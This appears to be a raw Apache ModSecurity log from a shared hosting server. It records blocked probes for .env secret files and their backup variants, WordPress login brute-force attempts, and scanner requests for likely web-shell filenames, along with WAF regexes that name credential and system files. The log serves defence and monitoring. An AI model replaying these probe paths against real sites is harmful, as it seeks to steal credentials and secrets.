[Tue May 26 13:17:47.163344 2026] [security2:error] [pid 501489:tid 501745] [client 45.148.10.204:45700] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVCgAAAP4"]
[Tue May 26 13:17:47.170888 2026] [security2:error] [pid 501489:tid 501746] [client 45.148.10.204:45728] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVCwAAAP8"]
[Tue May 26 13:17:47.173586 2026] [security2:error] [pid 501489:tid 501719] [client 45.148.10.204:45708] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVDAAAAOg"]
[Tue May 26 13:17:47.229044 2026] [security2:error] [pid 501489:tid 501680] [client 45.148.10.204:45736] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVDgAAAME"]
[Tue May 26 13:17:47.253183 2026] [security2:error] [pid 501489:tid 501725] [client 45.148.10.204:45744] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVDwAAAO0"]
[Tue May 26 13:17:47.257478 2026] [security2:error] [pid 501489:tid 501681] [client 45.148.10.204:51816] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVEAAAAMI"]
[Tue May 26 13:17:47.275057 2026] [security2:error] [pid 501489:tid 501701] [client 45.148.10.204:51818] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVEwAAANY"]
[Tue May 26 13:17:47.276670 2026] [security2:error] [pid 501489:tid 501691] [client 45.148.10.204:51824] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVEgAAAMw"]
[Tue May 26 13:17:47.302655 2026] [security2:error] [pid 501489:tid 501700] [client 45.148.10.204:51834] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVFgAAANU"]
[Tue May 26 13:17:47.307371 2026] [security2:error] [pid 501489:tid 501644] [client 45.148.10.204:51832] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVFwAAAJ4"]
[Tue May 26 13:17:47.381164 2026] [security2:error] [pid 501489:tid 501683] [client 45.148.10.204:51866] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVGAAAAMQ"]
[Tue May 26 13:17:47.395449 2026] [security2:error] [pid 501489:tid 501620] [client 45.148.10.204:51850] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVGQAAAIY"]
[Tue May 26 13:17:47.397114 2026] [security2:error] [pid 501489:tid 501672] [client 45.148.10.204:51874] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVGgAAALk"]
[Tue May 26 13:17:47.400717 2026] [security2:error] [pid 501489:tid 501724] [client 45.148.10.204:51878] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVGwAAAOw"]
[Tue May 26 13:17:47.690187 2026] [security2:error] [pid 501489:tid 501669] [client 45.148.10.204:51890] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVKQAAALY"]
[Tue May 26 13:17:47.807347 2026] [security2:error] [pid 501489:tid 501646] [client 103.101.90.175:53747] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVDQAAAJ8"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 13:17:47.841263 2026] [security2:error] [pid 501489:tid 501735] [client 45.148.10.204:51904] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVMAAAAPU"]
[Tue May 26 13:17:48.032262 2026] [security2:error] [pid 501489:tid 501688] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVJQAAAMk"]
[Tue May 26 13:17:50.600689 2026] [security2:error] [pid 501489:tid 501749] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQJmkFNZ9cRlz80IjVaQAAAQI"]
[Tue May 26 13:17:51.371378 2026] [security2:error] [pid 501489:tid 501572] [remote 216.185.214.209:35992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.214.185.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVQJ2kFNZ9cRlz80IjVgwAAt1I"]
[Tue May 26 13:17:52.136508 2026] [security2:error] [pid 501489:tid 501697] [client 74.7.175.141:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "agsnails.com.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVQJmkFNZ9cRlz80IjVcwAAANI"]
[Tue May 26 13:17:52.207857 2026] [security2:error] [pid 501489:tid 501622] [client 74.7.175.141:37674] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "agsnails.com.thedebateafrica.org"] [uri "/robots.txt"] [unique_id "ahVQJmkFNZ9cRlz80IjVcQAAiGE"]
[Tue May 26 13:17:52.296294 2026] [security2:error] [pid 501489:tid 501629] [client 31.57.184.107:62263] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/wp-login.php"] [unique_id "ahVQKGkFNZ9cRlz80IjVmgAAAI8"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 13:17:52.655918 2026] [security2:error] [pid 501489:tid 501750] [client 4.201.75.230:33889] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/bb.php"] [unique_id "ahVQKGkFNZ9cRlz80IjVqgAAAQM"]
[Tue May 26 13:17:53.160752 2026] [security2:error] [pid 501489:tid 501643] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQKGkFNZ9cRlz80IjVrgAAAJ0"]
[Tue May 26 13:17:53.962448 2026] [security2:error] [pid 501489:tid 501655] [client 4.201.75.230:33866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/222.php"] [unique_id "ahVQKWkFNZ9cRlz80IjV3AAAAKg"]
[Tue May 26 13:17:55.272004 2026] [security2:error] [pid 501489:tid 501657] [client 142.248.80.176:19788] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.production.copy"] [unique_id "ahVQK2kFNZ9cRlz80IjV_wAAAKo"]
[Tue May 26 13:17:55.352861 2026] [security2:error] [pid 501489:tid 501640] [client 4.201.75.230:33864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/test1.php"] [unique_id "ahVQK2kFNZ9cRlz80IjWAAAAAJo"]
[Tue May 26 13:17:55.468519 2026] [security2:error] [pid 501489:tid 501643] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQK2kFNZ9cRlz80IjV_gAAAJ0"]
[Tue May 26 13:17:56.272576 2026] [security2:error] [pid 501489:tid 501671] [client 142.248.80.176:64704] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.bak"] [unique_id "ahVQLGkFNZ9cRlz80IjWHgAAALg"]
[Tue May 26 13:17:56.273319 2026] [security2:error] [pid 501489:tid 501669] [client 142.248.80.176:64672] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.old"] [unique_id "ahVQLGkFNZ9cRlz80IjWIQAAALY"]
[Tue May 26 13:17:56.459853 2026] [security2:error] [pid 501489:tid 501718] [client 142.248.80.176:64880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.production.orig"] [unique_id "ahVQLGkFNZ9cRlz80IjWLQAAAOc"]
[Tue May 26 13:17:56.460331 2026] [security2:error] [pid 501489:tid 501658] [client 142.248.80.176:64866] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.production.backup"] [unique_id "ahVQLGkFNZ9cRlz80IjWKwAAAKs"]
[Tue May 26 13:17:56.460353 2026] [security2:error] [pid 501489:tid 501625] [client 142.248.80.176:64842] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.production.bak"] [unique_id "ahVQLGkFNZ9cRlz80IjWMQAAAIs"]
[Tue May 26 13:17:56.460944 2026] [security2:error] [pid 501489:tid 501666] [client 142.248.80.176:64876] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.production.swp"] [unique_id "ahVQLGkFNZ9cRlz80IjWLgAAALM"]
[Tue May 26 13:17:56.461102 2026] [security2:error] [pid 501489:tid 501667] [client 142.248.80.176:64804] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.local.swp"] [unique_id "ahVQLGkFNZ9cRlz80IjWMwAAALQ"]
[Tue May 26 13:17:56.461299 2026] [security2:error] [pid 501489:tid 501624] [client 142.248.80.176:64870] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.production~"] [unique_id "ahVQLGkFNZ9cRlz80IjWLwAAAIo"]
[Tue May 26 13:17:56.461402 2026] [security2:error] [pid 501489:tid 501653] [client 142.248.80.176:64826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.local.copy"] [unique_id "ahVQLGkFNZ9cRlz80IjWMgAAAKY"]
[Tue May 26 13:17:56.461449 2026] [security2:error] [pid 501489:tid 501635] [client 142.248.80.176:64854] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.production.old"] [unique_id "ahVQLGkFNZ9cRlz80IjWMAAAAJU"]
[Tue May 26 13:17:56.461834 2026] [security2:error] [pid 501489:tid 501621] [client 142.248.80.176:64770] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.local.bak"] [unique_id "ahVQLGkFNZ9cRlz80IjWNQAAAIc"]
[Tue May 26 13:17:56.461871 2026] [security2:error] [pid 501489:tid 501659] [client 142.248.80.176:64796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.local~"] [unique_id "ahVQLGkFNZ9cRlz80IjWNAAAAKw"]
[Tue May 26 13:17:56.462026 2026] [security2:error] [pid 501489:tid 501685] [client 142.248.80.176:64816] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.local.orig"] [unique_id "ahVQLGkFNZ9cRlz80IjWNwAAAMY"]
[Tue May 26 13:17:56.462535 2026] [security2:error] [pid 501489:tid 501663] [client 142.248.80.176:64714] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.backup"] [unique_id "ahVQLGkFNZ9cRlz80IjWOQAAALA"]
[Tue May 26 13:17:56.462992 2026] [security2:error] [pid 501489:tid 501687] [client 142.248.80.176:64780] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.local.backup"] [unique_id "ahVQLGkFNZ9cRlz80IjWOwAAAMg"]
[Tue May 26 13:17:56.463218 2026] [security2:error] [pid 501489:tid 501632] [client 142.248.80.176:64708] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.local.old"] [unique_id "ahVQLGkFNZ9cRlz80IjWPQAAAJI"]
[Tue May 26 13:17:56.463294 2026] [security2:error] [pid 501489:tid 501745] [client 142.248.80.176:64736] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env~"] [unique_id "ahVQLGkFNZ9cRlz80IjWPAAAAP4"]
[Tue May 26 13:17:56.464280 2026] [security2:error] [pid 501489:tid 501720] [client 142.248.80.176:64760] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.copy"] [unique_id "ahVQLGkFNZ9cRlz80IjWOgAAAOk"]
[Tue May 26 13:17:56.464607 2026] [security2:error] [pid 501489:tid 501630] [client 142.248.80.176:64746] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.orig"] [unique_id "ahVQLGkFNZ9cRlz80IjWPwAAAJA"]
[Tue May 26 13:17:56.464832 2026] [security2:error] [pid 501489:tid 501705] [client 142.248.80.176:64744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env.swp"] [unique_id "ahVQLGkFNZ9cRlz80IjWPgAAANo"]
[Tue May 26 13:17:56.990841 2026] [security2:error] [pid 501489:tid 501650] [client 4.201.75.230:33865] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/css/autoload_classmap.php"] [unique_id "ahVQLGkFNZ9cRlz80IjWUQAAAKM"]
[Tue May 26 13:17:57.475251 2026] [security2:error] [pid 501489:tid 501490] [remote 121.200.216.55:37630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVQLWkFNZ9cRlz80IjWWwAAwQA"]
[Tue May 26 13:17:57.844738 2026] [security2:error] [pid 501489:tid 501729] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQLWkFNZ9cRlz80IjWYQAAAPA"]
[Tue May 26 13:17:59.698385 2026] [security2:error] [pid 501489:tid 501648] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQL2kFNZ9cRlz80IjWlAAAAKE"]
[Tue May 26 13:18:00.724847 2026] [security2:error] [pid 501489:tid 501494] [remote 31.24.44.107:36258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVQMGkFNZ9cRlz80IjWrwAAxQQ"]
[Tue May 26 13:18:02.254694 2026] [security2:error] [pid 501489:tid 501628] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQMWkFNZ9cRlz80IjW0gAAAI4"]
[Tue May 26 13:18:02.735663 2026] [security2:error] [pid 501489:tid 501720] [client 176.65.139.237:30792] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.cariocabpo.contabilidadecarioca.com.br"] [uri "/.env"] [unique_id "ahVQMmkFNZ9cRlz80IjW7QAAAOk"]
[Tue May 26 13:18:02.812662 2026] [security2:error] [pid 501489:tid 501643] [client 4.201.75.230:33879] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/fx.php"] [unique_id "ahVQMmkFNZ9cRlz80IjW7gAAAJ0"]
